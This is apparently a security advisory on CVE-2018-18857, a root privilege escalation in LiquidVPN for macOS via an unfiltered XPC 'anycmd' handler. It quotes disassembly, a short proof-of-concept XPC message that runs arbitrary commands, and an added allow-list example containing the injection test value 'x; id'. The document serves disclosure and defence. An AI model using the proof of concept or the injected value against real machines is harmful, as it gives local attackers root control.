ASA-2018-00026 – LiquidVPN: “anycmd” Privilege Escalation


Allele Security Alert

ASA-2018-00026

Identifier(s)

ASA-2018-00026, CVE-2018-18857

Title

“anycmd” Privilege Escalation

Vendor(s)

LiquidVPN

Product(s)

LiquidVPN for macOS

Affected version(s)

LiquidVPN 1.37, 1.36 and earlier

Fixed version(s)

Unknown

Proof of concept

Unknown

Description

LiquidVPN installs the helper tool “com.smr.liquidvpn.OVPNHelper” for performing privileged (root) actions. To allow other LiquidVPN components to send messages to the helper tool, it implements an XPC service. Static code analysis showed that the XPC service does not filter incoming messages. This means that regular users (local attackers) can craft arbitrary XPC messages and send them to the service.

Technical details

After receiving a message, the service checks for the existence of the “anycmd” parameter:

---
...
__text:00000001000012E8 lea rsi, aAnycmd ; "anycmd"
__text:00000001000012EF mov rdi, r14 ; char *
__text:00000001000012F2 call _strcmp
__text:00000001000012F7 test eax, eax
__text:00000001000012F9 jnz loc_1000016C2
__text:00000001000012FF mov [rbp+var_10A38], r15
__text:0000000100001306 lea rsi, aCommandLine ; "command_line"
__text:000000010000130D mov rdi, rbx
...
__text:0000000100001336 lea rsi, aR ; "r"
__text:000000010000133D mov rdi, r14 ; char *
__text:0000000100001340 call _popen
...
---

If “anycmd” is found, the “command_line” parameter is extracted from the message and passed directly to popen() as the command to run.

The following proof of concept can be used to execute arbitrary system commands:

---
...
xpc_dictionary_set_string(message, "cmd", "anycmd");
xpc_dictionary_set_bool(message, "blocking", FALSE);
xpc_dictionary_set_string(message, "command_line", "[ARBITRARY CMD]");
...
---
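
For contrast with the popen() path above, the following added example (not code from LiquidVPN or from the original advisory) sketches how a privileged helper can dispatch requests through a fixed allow-list and build an argv for posix_spawn()/execv() instead of handing a client string to a shell. The operation names, binary paths and the build_argv()/valid_name() helpers are assumptions made for illustration. It covers command dispatch only; checking who is connecting to the service is a separate control.

```c
#include <stdio.h>
#include <string.h>

/* Hypothetical operation table: the advisory does not list the helper's real
 * commands, so these names and paths are constructed for illustration. */
struct op { const char *cmd, *path, *fixed_arg; int takes_name; };
static const struct op ALLOWED[] = {
    { "flush_dns",    "/usr/bin/dscacheutil",    "-flushcache", 0 },
    { "load_profile", "/usr/local/sbin/openvpn", "--config",    1 },
};

/* Accept 1..32 chars of [A-Za-z0-9_-], not starting with '-' (option-like). */
static int valid_name(const char *s)
{
    size_t n = 0;
    if (s == NULL || s[0] == '-') return 0;
    for (; s[n] != '\0'; n++) {
        char c = s[n];
        int ok = (c >= 'a' && c <= 'z') || (c >= 'A' && c <= 'Z') ||
                 (c >= '0' && c <= '9') || c == '_' || c == '-';
        if (!ok || n >= 32) return 0;
    }
    return n > 0;
}

/* Map a request to a fixed argv for posix_spawn()/execv(); no shell is involved.
 * Returns 0 on success, -1 for anything not in the table (including "anycmd"). */
int build_argv(const char *cmd, const char *name, const char *argv[4])
{
    if (cmd == NULL) return -1;
    for (size_t i = 0; i < sizeof ALLOWED / sizeof ALLOWED[0]; i++) {
        const struct op *o = &ALLOWED[i];
        if (strcmp(cmd, o->cmd) != 0) continue;
        if (o->takes_name && !valid_name(name)) return -1;
        argv[0] = o->path;
        argv[1] = o->fixed_arg;
        argv[2] = o->takes_name ? name : NULL;
        argv[3] = NULL;
        return 0;
    }
    return -1;
}

int main(void)
{
    const char *argv[4];
    printf("anycmd       -> %d\n", build_argv("anycmd", "id", argv));
    printf("load_profile -> %d\n", build_argv("load_profile", "office-1", argv));
    printf("bad name     -> %d\n", build_argv("load_profile", "x; id", argv));
    return 0;
}
```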

Credits

Bernd Leitner

Reference(s)

Multiple Privilege Escalation Vulnerabilities in LiquidVPN for MacOS (CVE-2018-18856, CVE-2018-18857, CVE-2018-18858, CVE-2018-18859)
https://seclists.org/fulldisclosure/2018/Nov/1

CVE-2018-18857
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-18857

CVE-2018-18857
https://nvd.nist.gov/vuln/detail/CVE-2018-18857


Last modified: February 1, 2019
